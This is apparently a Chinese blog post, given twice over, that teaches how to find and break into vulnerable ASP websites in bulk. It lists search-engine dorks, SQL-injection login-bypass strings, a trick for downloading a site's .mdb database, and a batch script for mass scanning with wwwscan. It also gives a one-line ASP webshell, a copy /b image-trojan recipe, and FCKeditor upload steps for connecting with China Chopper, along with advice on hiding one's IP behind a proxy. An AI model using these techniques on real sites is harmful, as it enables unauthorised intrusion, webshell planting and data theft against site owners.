利用搜索引擎批量搜索注入漏洞SQL注入(2)
2017-03-12 22:44
716 查看
搜索引擎语言:
inurl:例如:inurl:admin.asp 把网址中出现admin。asp的都搜索出来或者inurl:.asp?
intext:在内容中找
intitle:在头顶中找
site:属于...的网页例如:site:baidu.com属于百度的网页
由于公司的asp网页较容易出现漏洞则搜索:
inurl:.asp?id= intext:公司
一般的后台为:
admin.asp所以在搜索中可以搜索:inurl:admin.asp inurl:adminlogin.asp
进入后台后不安全的后台的万能密码:
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
.................(写在用户名上)
申请http代理来掩盖自己的ip地址:工具 Internet选项 链接 局域网设置 为LAN使用代理服务器
默认网站一般在c盘的intput下的wwwroot文件夹下
破解加密的网站:cmd5.cn
网站的后台一般为:/admin.asp
/admin/admin_login.asp
搜索:server.mappath(".mdb")
在搜索结果中找到mdb结尾的一串复制到网站后面就可以下载网站的数据库从而获得管理权限
下面是有关扫描起的使用:绿色而且返回时200为成功,灰色的都是失败例如wwwscan的使用
可以写个批处理文件(同时要创建一个url.text文件夹用来存放网址,这样一点批处理就会处理.txt中的网址)
@echo off
color 0a
rem MODE con cols=80 LINES=36
cls
for /f %% a in(url.text) do wwwscan.exe %%a -m 300 -t 30 -f 90
(具体的建议百度)
下面是一句话木马:
创建一个.asp结尾的文件,用记事本的方式打开:
<%excute request("***")%>
***为自由输入值也是中国菜刀后面要输入的密码值(这个语句是可以下载其他文件中来增加隐蔽性的)
制作图片木马:
在一个文件夹下放一张图,并且写一个一句话木马文件,之后写一个批处理文件:
copy 1.jpg/b+1.text/a diy.jpg
一个文件夹以.asp结尾那么这个文件夹中的文件都已.asp的方式解释
这个图片木马也要放在以.asp结尾的文件夹中
用扫描器扫描出的带有fckeditor的文件则存在fck编辑器漏洞
进入这些链接,创建好文件夹并上传图片木马,用菜刀去连接
inurl:例如:inurl:admin.asp 把网址中出现admin。asp的都搜索出来或者inurl:.asp?
intext:在内容中找
intitle:在头顶中找
site:属于...的网页例如:site:baidu.com属于百度的网页
由于公司的asp网页较容易出现漏洞则搜索:
inurl:.asp?id= intext:公司
一般的后台为:
admin.asp所以在搜索中可以搜索:inurl:admin.asp inurl:adminlogin.asp
进入后台后不安全的后台的万能密码:
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
.................(写在用户名上)
申请http代理来掩盖自己的ip地址:工具 Internet选项 链接 局域网设置 为LAN使用代理服务器
默认网站一般在c盘的intput下的wwwroot文件夹下
破解加密的网站:cmd5.cn
网站的后台一般为:/admin.asp
/admin/admin_login.asp
搜索:server.mappath(".mdb")
在搜索结果中找到mdb结尾的一串复制到网站后面就可以下载网站的数据库从而获得管理权限
下面是有关扫描起的使用:绿色而且返回时200为成功,灰色的都是失败例如wwwscan的使用
可以写个批处理文件(同时要创建一个url.text文件夹用来存放网址,这样一点批处理就会处理.txt中的网址)
@echo off
color 0a
rem MODE con cols=80 LINES=36
cls
for /f %% a in(url.text) do wwwscan.exe %%a -m 300 -t 30 -f 90
(具体的建议百度)
下面是一句话木马:
创建一个.asp结尾的文件,用记事本的方式打开:
<%excute request("***")%>
***为自由输入值也是中国菜刀后面要输入的密码值(这个语句是可以下载其他文件中来增加隐蔽性的)
制作图片木马:
在一个文件夹下放一张图,并且写一个一句话木马文件,之后写一个批处理文件:
copy 1.jpg/b+1.text/a diy.jpg
一个文件夹以.asp结尾那么这个文件夹中的文件都已.asp的方式解释
这个图片木马也要放在以.asp结尾的文件夹中
用扫描器扫描出的带有fckeditor的文件则存在fck编辑器漏洞
进入这些链接,创建好文件夹并上传图片木马,用菜刀去连接
相关文章推荐
- ECSHOP 搜索注入漏洞利用exp及后台拿shell
- 利用登陆文件注入漏洞给网页挂马
- DiscuzX2注入漏洞及XSS漏洞的利用
- 利用SQL注入漏洞登录后台
- 测试web应用程序搜索SQL注入漏洞
- 非常见SQL注入漏洞及利用 Unusual SQL injection vulnerabilities and how to exploit them
- 利用SQL注入漏洞登录后台的实现方法
- 利用XSS注入漏洞能对网站做什么
- win32k.sys驱动的注入与利用漏洞
- SQL注入天书之ASP注入漏洞全接触
- SQL注入天书--ASP注入漏洞全接触
- SQL注入天书 - ASP注入漏洞全接触
- dedecms plus/search.php 注入漏洞利用EXP
- SQL注入天书 - ASP注入漏洞全接触
- SQL注入天书-ASP注入漏洞全接触
- 非常见SQL注入漏洞及利用 Unusual SQL injection vulnerabilities and how to exploit them
- SQL注入天书 - ASP注入漏洞全接触
- SQL注入漏洞的分析与利用(一)
- SQL注入漏洞的分析与利用(三)
- SQL注入天书—ASP注入漏洞全接触